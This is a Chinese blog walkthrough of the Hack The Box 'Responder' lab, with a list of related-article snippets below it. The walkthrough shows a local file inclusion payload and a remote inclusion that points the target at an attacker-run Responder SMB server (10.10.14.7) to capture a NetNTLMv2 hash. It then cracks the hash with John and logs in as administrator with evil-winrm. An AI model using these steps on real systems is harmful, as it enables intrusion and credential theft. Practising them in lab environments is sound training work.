hack the box(5985 WinRM)

最新推荐文章于 2025-03-18 17:01:21 发布
最新推荐文章于 2025-03-18 17:01:21 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 计算机网络 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/124253053
版权
本文介绍了如何使用Nmap进行详细扫描,发现Windows系统上的服务和漏洞,如Apache、WinRM和恶意SMB服务器。重点讲述了利用WinRM进行远程管理权限的获取,以及通过Responder进行密码破解的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nmap参数定义

-v:增加详细级别(基本上输出更多信息)-p-:此标志扫描0-65535范围内的所有TCP端口-sV:尝试确定端口上运行的服务版本-sC:使用默认NSE脚本扫描--min-rate:这用于指定Nmap每秒应发送的最小数据包数;数字越高,扫描速度越快

nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91

 根据Nmap扫描的结果,机器使用Windows作为操作系统,在端口80上运行Apache Web服务器,在端口5985上运行WinRM。7680端口上运行的服务标识为pando pub,这是一种文件传输服务。


 

当访问http://{target_IP}/时,网站重定向为unika.htb。

基于名称的虚拟托管是一种在单个服务器上托管多个域名(每个域名分别处理)的方法。这允许一台服务器共享其资源,例如内存和处理器周期,而不需要相同主机名使用所有服务。web服务器检查HTTP请求的主机头字段中提供的域名,并根据该域名发送响应。/etc/hosts文件用于将主机名解析为IP地址,因此我们需要在该域的/etc/hosts文件中添加一个条目,以使浏览器能够解析unika的地址。

echo "10.129.136.91 unika.htb" | sudo tee -a /etc/hosts

文件包含漏洞

动态网站包括动态的HTML页面,使用来自HTTP请求的信息包括GET和POST参数、cookie和其他变量。一个页面通常会根据其中一些参数“include”另一个页面。

LFI或本地文件包含是指攻击者能够让网站包含一个本不打算作为此应用程序选项的文件。一个常见的例子是,应用程序使用文件的路径作为输入。如果应用程序将此输入视为受信任的,并且未对此输入执行所需的检查,则攻击者可以使用 ../ 输入文件名并最终在本地文件系统中查看敏感文件。在某些有限的情况下,LFI也会导致代码执行。

RFI或远程文件包含类似于LFI,但在这种情况下,攻击者可以使用HTTP、FTP等协议在主机上加载远程文件。

http://unika.htb/index.php?
page=../../../../../../../../windows/system32/drivers/etc/hosts

Responder

工作流程

Responder程序可以执行多种不同类型的攻击,但在这种情况下,它将设置恶意SMB服务器。
当目标计算机尝试对该服务器执行NTLM身份验证时,Responder会向服务器发送一个challenge,要求服务器使用用户的密码进行加密。当服务器响应时,Responder将使用质询和加密响应生成NetNTLMv2。虽然我们无法逆转NetNTLMv2,但我们可以尝试使用许多不同的常用密码,看看是否有任何密码会生成相同的challenge响应,如果找到一个,我们就知道这就是密码。这通常被称为散列破解,我们将使用一个名为John The Ripper的程序来实现。

使用Responder之前需要查看Responder.conf配置文件,SMB的服务是否开启。

 配置文件就绪后,我们可以继续使用python3启动响应程序,通过-I标志传入接口以监听:

python Responder.py -I tun0

 在响应服务器就绪的情况下,我们通过web浏览器按如下方式设置页面参数,告诉服务器包含来自SMB服务器的资源。

http://unika.htb/?page=/10.10.14.7/somefile  #服务器端访问

监听得到

 将得到的hash值保存为hash.txt文件。

散列破解

将上述的hash值保存为hash.txt

我们将散列文件传递给john,并破解管理员帐户的密码。散列类型由john命令行工具自动识别:

-w : wordlist to use for cracking the hash

john -w=/usr/share/wordlists/rockyou.txt hash.txt

 得出关键信息:password:badminton

WinRM

Windows Remote Management或WinRM是Windows本机内置的远程管理协议,基本上使用简单的对象访问协议与远程计算机和服务器以及操作系统和应用程序进行交互。WinRM允许用户:

→ 与主机进行远程通信和接口

→ 在非本地但可通过网络访问的系统上远程执行命令。
→ 从远程位置监视、管理和配置服务器、操作系统和客户机。
作为pentester,这意味着如果我们能找到具有远程管理权限的用户的凭据(通常是用户名和密码),我们就有可能在主机上获得PowerShell外壳。

利用evil-winrm远程连接:

evil-winrm -i 10.129.136.91 -u administrator -p badminton

WinRM远程管理服务渗透利用(端口:5985
墨痕诉清风的博客
04-19 2797
WinRM远程管理服务渗透利用(端口:5985
网络协议-TCP与UDP
qq_43381463的博客
10-23 1763
TCP与UDP
hackthebox - heist (考点: 思科密码 & 5985 winrm & lookupsid.py & firefox提权/procdump.exe )
冬萍子癸水
05-20 1367
1 扫描 80进web搜集信息,445利用smb,5985winrm远程登录,有专门的漏洞工具登录。49668又扫了下。没用。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.149 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-19 23:53:47 GMT -- forced options: -sS -Pn -n --randomize-
TCP7680端口是什么服务
静宁宇思
03-07 493
确认TCP7680端口是Windows系统更新“传递优化”功能的服务端口,个人理解应该是Windows利用这个TCP7680端口,直接从内网已经具备更新包的主机上共享下载该升级包,无需从微软官方下载更新包,从而提高下载速度和节省微软的网络资源。
关于内网常见端口漏洞和windows下wmic
rlenew的博客
04-25 1613
WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要使用WMI管理系统是很困难的。WMIC改变了这种情况,为WMI名称空间提供了一个强.
从渗透到红队(二)漏洞利用
weixin_66146598的博客
01-27 709
各大厂商的服务端或者硬件设备不可能做到每年都更新,所以之前存在的NDay漏洞,或者服务端口漏洞,都是可以尝试的。可以复现一些常见漏洞进行提高。简单整理了一些常见端口漏洞,以及WEB组件漏洞。
2021-08-29web培训作业3(fckeditor判断,通达oa漏洞,渗透脑图)
qq_45290991的博客
08-29 874
Web3 作业 一、写一个脚本判断fck的版本 思路:找到“version”字段,向下取30个字符,其中规则匹配1.2 1.2.3 1.2.3.4 这样的。输出。 Python脚本: import os import re import requests def check(url): headers={ 'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l...
hackthebox- Froest (考点:Kerberos pre-authentication/win-rm&5985/域渗透)
冬萍子癸水
04-17 3207
nullinux rpcclient -U "" -N 10.10.10.161 enumdomusers gem install evil-winrm 科普
HackTheBox(黑客盒子)基础模块速通Responder篇
轻舟已过万重山
06-08 1727
Responder是HackTheBox平台上的一个基础模块,用于嗅探网络中的NTLMv1/v2认证请求,并进行中间人攻击。本篇文章将介绍Responder的基本用法和一些常用技巧。
Hack The Box - STARTING POINT
小小郭的博客
03-06 2606
Hack The Box - STARTING POINT
Hack The Box——Sauna
江左盟的博客
05-27 3777
简介 信息收集 使用nmap --min-rate 10000 -T5 -A -p1-65535 10.10.10.175扫描端口及服务发现开启的端口非常的多,如图: 查看web服务各功能及源代码,未发现获得Shell的漏洞,网站时静态的,通过W3layouts生成,如图: 扫描网站目录也未发现有价值的线索,如图: 然后看到389端口和3268端口都运行着ldap服...
端口排查步骤-7680端口分析-Dosvc服务
weixin_41666796的博客
09-27 1400
https://www.cnblogs.com/magicalpig/p/11691771.html
横向移动 – WinRM
2301_80127209的博客
04-19 981
同学们可能没有听说过WinRM横向移动技术,今天我给大家分析讲解一波儿看不懂也没关系,先看看有个大概的概念,以后慢慢就懂了。
Windows查看端口占用并关闭
程序猿老樊的博客
09-29 3061
1.win+R输入cmd打开命令行窗口输入netstat -a -n -o查看端口与之对应的PID(如7680端口被3556PID程序占用)。 2.打开任务管理器(Ctrl+Shift+ESC),点击上方详细信息将对应的PIN程序关闭,释放端口。 ...
HTB_Responder 综合靶机 菜菜被虐现场实录
网络安全学习
04-26 4722
今天的练习有一点苦恼,啥都不会 😭😭😭😭 文章目录信息收集修改 host 进入网站查看网站功能探测漏洞-文件包含利用 SMB 窃取 NTLM hashNTLM 碰撞获取可用账号密码获取 shell后放答案 信息收集 拿到靶机日常扫描不用说了,-A 竟然什么都没扫描到 ┌──(root💀kali)-[~] └─# nmap -A -T4 10.129.95.234 All 1000 scanned ports on bogon (10.129.95.234) are in ignored states. .
Windows系列:彻底禁用DeliveryOptimization
热门推荐
weixin_54626591的博客
12-08 1万+
彻底禁用DeliveryOptimization
4.16-WinRM远程执行命令横向移动
最新发布
qq_38122566的博客
03-18 561
WinRM(Windows远程管理)是Microsoft在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有基板管理控制器(BMC)的任何远程计算机一起使用,以获取数据。也可以获取基于Windows的计算机(包括WinRM)WinRM默认端口5985(HTTP端口)或5986(HTTPS端口),若配置了WINRM远程服务,当我们拿到一个管理员账户时,可以使用远程连接进行命令执行操作。
nmap命令_nmap的一些高级参数
weixin_39833290的博客
12-05 1279
1、检查主机是否有恶意行为NMAP通过调用谷歌安全浏览服务API来检查主机是否进行恶意软件分发或者网络钓鱼攻击的行为。使用脚本http-google-malware之前,先获取谷歌安全浏览服务API的密钥:https://developers.google.com/safe-browsing/key_signup?csw=1 Nmap -p80 -script http-google-malwa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值